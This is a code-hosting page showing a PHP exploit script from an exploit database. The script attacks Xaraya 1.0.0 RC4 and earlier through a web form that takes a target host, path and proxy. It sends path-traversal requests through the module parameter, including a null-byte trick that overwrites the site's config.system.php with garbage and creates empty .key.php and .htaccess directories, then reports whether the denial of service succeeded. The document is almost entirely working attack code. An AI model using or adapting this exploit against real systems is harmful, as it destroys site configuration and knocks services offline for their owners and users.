PageRenderTime 30ms CodeModel.GetById 26ms RepoModel.GetById 1ms app.codeStats 0ms

/platforms/php/webapps/1345.php

https://github.com/B-Rich/exploit-database
PHP | 211 lines | 184 code | 15 blank | 12 comment | 26 complexity | 9a588e9b0d79eafdf0199056e2bba1ab MD5 | raw file
  1. <?php
  2. # ---Xaraya_DOS.php 17.30 28/11/2005 #
  3. # #
  4. # Xaraya <=1.0.0 RC4 D.O.S #
  5. # coded by rgod #
  6. # site: http://rgod.altervista.org #
  7. # #
  8. # usage: launch from Apache, fill in requested fields, then go! #
  9. # #
  10. # Sun-Tzu: "Hold out baits to entice the enemy. Feign disorder, #
  11. # and crush him." #
  12. error_reporting(0);
  13. ini_set("max_execution_time",0);
  14. ini_set("default_socket_timeout", 2);
  15. ob_implicit_flush (1);
  16. echo'<html><head><title> ******** Xaraya <=1.0.0 rc4 Denial of Service *********
  17. </title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  18. <style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
  19. #ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
  20. {background-color: #FFFFFF !important} input {background-color: #303030
  21. !important} option { background-color: #303030 !important} textarea
  22. {background-color: #303030 !important} input {color: #1CB081 !important} option
  23. {color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
  24. {background-color: #303030 !important} select {font-weight: normal; color:
  25. #1CB081; background-color: #303030;} body {font-size: 8pt !important;
  26. background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
  27. 0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
  28. !important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
  29. !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
  30. !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
  31. normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
  32. { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
  33. color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
  34. font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
  35. font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
  36. ********** Xaraya <=1.0.0 rc4 Denial of Service ******** </p><p class="Stile6">a
  37. script by rgod at <a href="http://rgod.altervista.org"target="_blank">
  38. http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
  39. name="form1" method="post" action="'.strip_tags($SERVER[PHP_SELF]).'"><p><input
  40. type="text" name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
  41. </span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
  42. /xaraya/ or just / ) </span></p></p><p> <input type="text" name="port"> <span
  43. class="Stile5">specify a port other than 80 ( default value ) </span> </p>
  44. <p> <input type="text" name="proxy"><span class="Stile5"> send exploit
  45. through an HTTP proxy (ip:port)</span></p><p><input type="submit" name="Submit"
  46. value="go!"></p></form> </td></tr></table></body></html>';
  47. function show($headeri)
  48. {
  49. $ii=0;
  50. $ji=0;
  51. $ki=0;
  52. $ci=0;
  53. echo '<table border="0"><tr>';
  54. while ($ii <= strlen($headeri)-1)
  55. {
  56. $datai=dechex(ord($headeri[$ii]));
  57. if ($ji==16) {
  58. $ji=0;
  59. $ci++;
  60. echo "<td>&nbsp;&nbsp;</td>";
  61. for ($li=0; $li<=15; $li++)
  62. { echo "<td>".$headeri[$li+$ki]."</td>";
  63. }
  64. $ki=$ki+16;
  65. echo "</tr><tr>";
  66. }
  67. if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
  68. {echo "<td>".$datai."</td> ";}
  69. $ii++;
  70. $ji++;
  71. }
  72. for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
  73. { echo "<td>&nbsp&nbsp</td>";
  74. }
  75. for ($li=$ci*16; $li<=strlen($headeri); $li++)
  76. { echo "<td>".$headeri[$li]."</td>";
  77. }
  78. echo "</tr></table>";
  79. }
  80. $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
  81. function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
  82. //next function to send packets
  83. {
  84. global $proxy, $host, $port, $packet, $html, $proxy_regex;
  85. $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  86. if ($socket < 0) {
  87. echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
  88. }
  89. else
  90. { $c = preg_match($proxy_regex,$proxy);
  91. if (!$c) {echo 'Not a valid prozy...';
  92. die;
  93. }
  94. echo "OK.<br>";
  95. echo "Attempting to connect to ".$host." on port ".$port."...<br>";
  96. if ($proxy=='')
  97. {
  98. $result = socket_connect($socket, $host, $port);
  99. }
  100. else
  101. {
  102. $parts =explode(':',$proxy);
  103. echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
  104. $result = socket_connect($socket, $parts[0],$parts[1]);
  105. }
  106. if ($result < 0) {
  107. echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
  108. }
  109. else
  110. {
  111. echo "OK.<br><br>";
  112. $html= '';
  113. socket_write($socket, $packet, strlen($packet));
  114. echo "Reading response:<br>";
  115. while ($out= socket_read($socket, 2048)) {$html.=$out;}
  116. echo nl2br(htmlentities($html));
  117. echo "Closing socket...";
  118. socket_close($socket);
  119. }
  120. }
  121. }
  122. function sendpacketii($packet)
  123. {
  124. global $proxy, $host, $port, $html, $proxy_regex;
  125. if ($proxy=='')
  126. {$ock=fsockopen(gethostbyname($host),$port);
  127. if (!$ock) { echo 'No response from '.htmlentities($host);
  128. die; }
  129. }
  130. else
  131. {
  132. $c = preg_match($proxy_regex,$proxy);
  133. if (!$c) {echo 'Not a valid prozy...';
  134. die;
  135. }
  136. $parts=explode(':',$proxy);
  137. echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
  138. $ock=fsockopen($parts[0],$parts[1]);
  139. if (!$ock) { echo 'No response from proxy...';
  140. die;
  141. }
  142. }
  143. fputs($ock,$packet);
  144. if ($proxy=='')
  145. {
  146. $html='';
  147. while (!feof($ock))
  148. {
  149. $html.=fgets($ock);
  150. }
  151. }
  152. else
  153. {
  154. $html='';
  155. while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
  156. {
  157. $html.=fread($ock,1);
  158. }
  159. }
  160. fclose($ock);
  161. echo nl2br(htmlentities($html));
  162. }
  163. $host=$_POST[host];$path=$_POST[path];
  164. $port=$_POST[port];$proxy=$_POST[proxy];
  165. if (($host<>'') and ($path<>''))
  166. {
  167. $port=intval(trim($port));
  168. if ($port=='') {$port=80;}
  169. if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
  170. if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  171. $host=str_replace("\r\n","",$host);
  172. $path=str_replace("\r\n","",$path);
  173. $KEYFILE=urlencode("../../../../.key.php"); //to create an empty key.php dir...
  174. $HTACCESS=urlencode("../../../../../.htaccess"); //to create an empty .htaccess dir...
  175. $CONFIGFILE=urlencode("../../../../config.system.php".CHR(0x00)); //overwrite configuration file with garbage
  176. $request[0]="index.php?module=".$KEYFILE;
  177. $request[1]="index.php?module=".$HTACCESS;
  178. $request[2]="index.php?module=".$CONFIGFILE;
  179. $request[3]="index.php";
  180. for($i=0; $i<=count($request)-1; $i++)
  181. {
  182. $packet="GET ".$p.$request[$i]." HTTP/1.1\r\n";
  183. $packet.="Host: ".$host."\r\n";
  184. $packet.="User-Agent: Zoo Tycoon 2 Client\r\n";
  185. $packet.="Accept-Encoding: text/plain\r\n";
  186. $packet.="Connection: Close\r\n\r\n";
  187. show($packet);
  188. sendpacketii($packet);
  189. }
  190. if (eregi('fatal error',$html)) {echo "Exploit succeeded...";}
  191. else {echo "Exploit failed...";}
  192. }
  193. else
  194. {echo "Fill * required fields, optionally specify a proxy";}
  195. ?>
  196. # milw0rm.com [2005-11-29]